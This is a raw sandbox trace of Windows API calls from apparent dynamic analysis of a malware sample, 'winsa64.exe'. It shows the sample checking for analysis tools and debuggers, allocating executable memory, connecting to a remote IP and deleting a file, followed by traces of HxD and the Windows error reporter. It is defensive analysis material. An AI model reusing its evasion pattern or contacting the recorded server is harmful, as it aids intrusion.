OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(kernel32.dll) [c:\windows\winsa64.exe]
LoadLibrary(user32.dll) [c:\windows\winsa64.exe]
LoadLibrary(advapi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(oleaut32.dll) [c:\windows\winsa64.exe]
LoadLibrary(msvcrt.dll) [c:\windows\winsa64.exe]
LoadLibrary(ole32.dll) [c:\windows\winsa64.exe]
LoadLibrary(version.dll) [c:\windows\winsa64.exe]
LoadLibrary(gdi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(wininet.dll) [c:\windows\winsa64.exe]
LoadLibrary(shlwapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(normaliz.dll) [c:\windows\winsa64.exe]
LoadLibrary(urlmon.dll) [c:\windows\winsa64.exe]
LoadLibrary(iertutil.dll) [c:\windows\winsa64.exe]
LoadLibrary(comctl32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(lz32.dll) [c:\windows\winsa64.exe]
LoadLibrary(lz32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\windows\winsa64.exe]
GetModuleHandle(kernel32.dll) [c:\windows\winsa64.exe]
VirtualQueryEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\windows\winsa64.exe]
OpenProcess(XueTr.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(Kernel32) [c:\windows\winsa64.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\winsa64.exe]
OpenProcessToken(C:\WINDOWS\winsa64.exe) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\winsa64.exe]
ResumeThread() [c:\windows\winsa64.exe]
GetModuleHandle(Advapi32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(LPK.DLL) [c:\windows\winsa64.exe]
OpenProcess(winsa64.exe) [c:\windows\winsa64.exe]
GetModuleHandle(USER32) [c:\windows\winsa64.exe]
LoadLibrary(imm32.dll) [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_NOACCESS) [c:\windows\winsa64.exe]
GetModuleHandle(oleaut32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(USER32.DLL) [c:\windows\winsa64.exe]
GetModuleHandle(comctl32.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\windows\winsa64.exe]
IsDebuggerPresent() [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\windows\winsa64.exe]
BitBlt() [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_EXECUTE_READWRITE) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\windows\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\windows\winsa64.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(version.dll) [c:\windows\winsa64.exe]
FreeLibrary() [c:\windows\winsa64.exe]
OpenMutex(ShimCacheMutex) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\windows\winsa64.exe]
GetModuleHandle(dbghelp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\windows\winsa64.exe]
LoadLibrary(wsock32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2_32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2help.dll) [c:\windows\winsa64.exe]
LoadLibrary(shell32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(INSONIA) [c:\windows\winsa64.exe]
CreateFile(C:\WINDOWS\winsa64.cfg) [c:\windows\winsa64.exe]
Sleep(100) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\windows\winsa64.exe]
LoadLibrary(hnetcfg.dll) [c:\windows\winsa64.exe]
LoadLibrary(rpcrt4.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\windows\winsa64.exe]
LoadLibrary(dnsapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(iphlpapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\winrnr.dll) [c:\windows\winsa64.exe]
LoadLibrary(wldap32.dll) [c:\windows\winsa64.exe]
LoadLibrary(rasadhlp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(ws2_32.dll) [c:\windows\winsa64.exe]
connect( 212.1.208.24:80 ) [c:\windows\winsa64.exe]
DeleteFile(C:\WINDOWS\a.exe) [c:\windows\winsa64.exe]
Sleep(60000000) [c:\windows\winsa64.exe]
Executing: c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(winspool.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(comdlg32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(winmm.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualQueryEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcessToken(C:\Documents and Settings\r32\Mis documentos\Tools\HxD\HxD.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
ResumeThread() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateEvent(DINPUTWINMM) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FindWindow(STATIC,000003C4_PID_FastMM) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
IsDebuggerPresent() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
BitBlt() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\Documents and Settings\r32\Mis documentos\Tools\HxD\HxD.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(psapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msimg32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETMENUANIMATION,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FindWindow(TXmInstanceManager,HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetWindowTextLength() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\Documents and Settings\r32\Mis documentos\Tools\HxD\HxD.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETKEYBOARDCUES,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetForegroundWindow() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SetTimer(1098a) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(xpsp2res.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(xpsp3res.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETFONTSMOOTHINGTYPE,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SetTimer(0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(MSCTF.Shared.MUTEX.EBH) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetKeyState() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenSCManager((null),(null)) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenService(AudioSrv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wdmaud.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(setupapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetComputerName() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wintrust.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(crypt32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msasn1.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(imagehlp.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\setupapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\wdmaud.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msacm32.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msacm32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\msacm32.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(midimap.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(MidiMapper_modLongMessage_RefCnt) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(MidiMapper_Configure) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\midimap.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\faultrep.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(userenv.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(winsta.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(netapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wtsapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateFile(C:\DOCUME~1\r32\CONFIG~1\Temp\74b4_appcompat.txt) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPMODULE,964) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\apphelp.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\apphelp.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateProcess((null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(winlogon.EXE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(advapi32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\dwwin.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcess(dwwin.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
WriteProcessMemory(c:\windows\system32\dwwin.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\dwwin.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
Executing: c:\windows\system32\dwwin.exe
LoadLibrary(advapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(comctl32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(gdi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(kernel32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(oleaut32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msvcrt.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(ole32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shell32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shlwapi.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(urlmon.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(iertutil.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(user32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(version.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(wininet.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(normaliz.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shimeng.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\apppatch\acgenral.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(kernel32.dll) [c:\windows\system32\dwwin.exe]
VirtualQueryEx(c:\windows\system32\dwwin.exe) [c:\windows\system32\dwwin.exe]
CreateMutex(SHIMLIB_LOG_MUTEX) [c:\windows\system32\dwwin.exe]
LoadLibrary(winmm.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msacm32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(userenv.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(uxtheme.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(lz32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(lz32.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(Kernel32) [c:\windows\system32\dwwin.exe]
GetModuleHandle(LPK.DLL) [c:\windows\system32\dwwin.exe]
OpenProcess(dwwin.exe) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\system32\dwwin.exe]
GetModuleHandle(USER32) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\system32\dwwin.exe]
OpenProcessToken(C:\WINDOWS\system32\dwwin.exe) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\system32\dwwin.exe]
LoadLibrary(imm32.dll) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\system32\dwwin.exe]
ResumeThread() [c:\windows\system32\dwwin.exe]
GetModuleHandle(Advapi32.dll) [c:\windows\system32\dwwin.exe]
CreateEvent(DINPUTWINMM) [c:\windows\system32\dwwin.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\windows\system32\dwwin.exe]
IsDebuggerPresent() [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\UxTheme.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(riched20.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shfolder.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\SHELL32.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\shfolder.dll) [c:\windows\system32\dwwin.exe]
BitBlt() [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
SetTimer(20996) [c:\windows\system32\dwwin.exe]
FreeLibrary() [c:\windows\system32\dwwin.exe]
CreateFile(C:\DOCUME~1\r32\CONFIG~1\Temp\597A56.dmp) [c:\windows\system32\dwwin.exe]
GetModuleHandle(NTDLL.DLL) [c:\windows\system32\dwwin.exe]
LoadLibrary(psapi.dll) [c:\windows\system32\dwwin.exe]
OpenProcess(HxD.exe) [c:\windows\system32\dwwin.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\windows\system32\dwwin.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPTHREAD,964) [c:\windows\system32\dwwin.exe]
QuerySystemInformation() [c:\windows\system32\dwwin.exe]
SuspendThread(1808) [c:\windows\system32\dwwin.exe]
SuspendThread(1800) [c:\windows\system32\dwwin.exe]
SuspendThread(1796) [c:\windows\system32\dwwin.exe]
SuspendThread(1792) [c:\windows\system32\dwwin.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPALL,964) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\ntdll.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\ntdll.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\USER32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\GDI32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\rpcrt4.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\RPCRT4.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\secur32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\Secur32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\OLEAUT32.DLL) [c:\windows\system32\dwwin.exe]
